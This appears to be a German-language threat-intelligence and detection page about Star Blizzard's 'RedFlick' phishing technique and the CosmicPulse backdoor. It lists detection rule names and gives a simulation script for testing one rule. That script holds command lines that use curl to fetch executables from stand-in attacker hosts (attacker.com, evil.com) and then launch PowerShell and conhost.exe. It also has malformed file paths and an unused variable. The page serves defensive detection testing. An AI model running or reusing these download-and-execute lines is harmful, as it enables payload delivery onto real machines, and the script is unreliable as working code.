Star Blizzard verwendet RedFlick zur Verbesserung von Phishing- und Malware-Bereitstellungen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der russische staatlich gesponserte Akteur Star Blizzard hat seine Vorgehensweise mit der RedFlick-Technik weiterentwickelt, um die CosmicPulse-Hintertür zu liefern. Der Akteur hat sich von hochgradig gezielten Spear-Phishing-Angriffen zu groß angelegten automatisierten Phishing-Kampagnen mit kompromittierten Websites verlagert. Diese Kampagnen nutzen ausgeklügelte Zustellmethoden, einschließlich VHDX-Dateien und Nutzlasten, die in PDF-Dateien versteckt sind, um der Erkennung zu entgehen.
Untersuchung
Microsoft Threat Intelligence analysierte verschiedene Phishing-Wellen, die im Laufe des Jahres 2026 beobachtet wurden, und identifizierte einen Übergang von ClickFix-basierten Ketten zu RedFlick-Planungsaufgaben. Die Untersuchung beschrieb einen mehrstufigen Ausführungsablauf, der LNK-Dateien, lokale SSH-Befehlsausführung und die Verwendung von WebDAV zur Remote-Nutzlastabholung umfasste. Die technische Analyse deckte auch die Verwendung von Steganographie und registrierungsbasierter Verschlüsselung für die CosmicPulse-Nutzlast auf.
Minderung
Organisationen sollten eine phishingsichere Authentifizierung und bedingte Zugriffsrichtlinien implementieren, um Identitäten zu sichern. Endpunkt-Schutz sollte mit EDR im Blockmodus und aktiviertem Echtzeit-Antivirenschutz konfiguriert werden. Darüber hinaus können durch die Implementierung von Regeln zur Reduzierung der Angriffsfläche die Ausführung verschleierter Skripte und nicht autorisierter ausführbarer Dateien verhindert werden.
Antwort
Nach einer Entdeckung sollten Sicherheitsteams EDR nutzen, um bösartige Artefakte zu beheben und verdächtige Anmeldeversuche zu untersuchen. Automatische Untersuchungs- und Wiederherstellungsmodi sollten aktiviert werden, um Reaktionszeiten zu verkürzen. Organisationen sollten auch fortschrittliche Anti-Phishing-Lösungen und Zero-Hour-Autopurge verwenden, um eingehende bösartige Kommunikation zu neutralisieren.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtige Befehlszeilen enthalten UNC-Pfad mit Ausführbarem als Argument (über cmdline)
Mögliche Netzfreigabe-Erkennung (über cmdline)
Verdächtige MsiExec Remote Installer Versteckte Installationsversuche (über cmdline)
LOLBAS Conhost (über cmdline)
Mögliche Tunneling Tool Nutzung [Windows] (über cmdline)
Verdächtige CURL-Nutzung (über cmdline)
Verdächtige Steuerung und Kontrolle durch unübliche Top-Level-Domain (TLD) DNS-Anfragen (über dns)
IOCs (HashSha256) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik
IOCs (SourceIP) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik
IOCs (DestinationIP) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik
Erkennung der PowerShell-Ausführung aus Download-PDF [Windows Powershell]
Erkennung der Star Blizzard RedFlick-Technik – Geplante Aufgaben und Befehlszeilenausführung [Windows Prozesskonstruktion]
Simulationsausführung
-
Angriffserzählung & Befehle: Der Angreifer liefert eine Phishing-E-Mail mit einem Link zu einer bösartigen Datei. Bei Interaktion wird eine Sequenz ausgelöst, bei der
curlverwendet wird, um eine sekundäre Phase abzurufen. Um sich mit Systemprozessen zu vermischen, wird der Befehl so gestaltet, dass er ausdrücklich die BegriffePowerShell,PDF(unter Bezugnahme auf die Quelle des Auslösers) undconhost.exein der Befehlszeilenzeichenfolge enthält, um der Logik der Zielerkennungsregel zu entsprechen. Das Ziel ist die Ausführung einer decodierten Nutzlast, die innerhalb einer PDF-Struktur eingebettet ist. -
Regressionstest-Skript:
# Simulation Skript zur Auslösung der 'Erkennung der PowerShell-Ausführung aus Download-PDF' Regel. # Dieses Skript konstruiert eine Befehlszeilenzeichenfolge, die alle vier erforderlichen Schlüsselwörter enthält. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extrahieren aus PDF...'; Start-Process conhost.exe}" # Wir führen über cmd aus, um sicherzustellen, dass conhost.exe Teil des Prozessbaums/Befehlskontextes ist Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extrahieren aus PDF... mit conhost.exe`"" -
Aufräumbefehle:
# Aufräumen von Dateien, die während der Simulation generiert wurden Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue